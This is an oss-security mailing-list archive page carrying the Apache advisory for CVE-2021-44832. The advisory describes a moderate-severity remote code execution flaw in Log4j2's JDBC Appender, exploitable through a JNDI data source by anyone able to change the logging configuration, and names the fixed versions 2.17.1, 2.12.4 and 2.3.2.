[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker contr
From: Matt Sicker <mattsicker () apache ! org>
Date: 2021-12-28 19:26:40
Message-ID: 5814f3ea-59ae-7533-1ea5-6e7203561a5e () apache ! org
[Download RAW message or body]
Severity: moderate
Description:
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix =
releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) =
attack where an attacker with permission to modify the logging =
configuration file can construct a malicious configuration using a JDBC =
Appender with a data source referencing a JNDI URI which can execute remote=
code. This issue is fixed by limiting JNDI data source names to the java =
protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
This issue is being tracked as LOG4J2-3293,
References:
https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
https://issues.apache.org/jira/browse/LOG4J2-3293
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic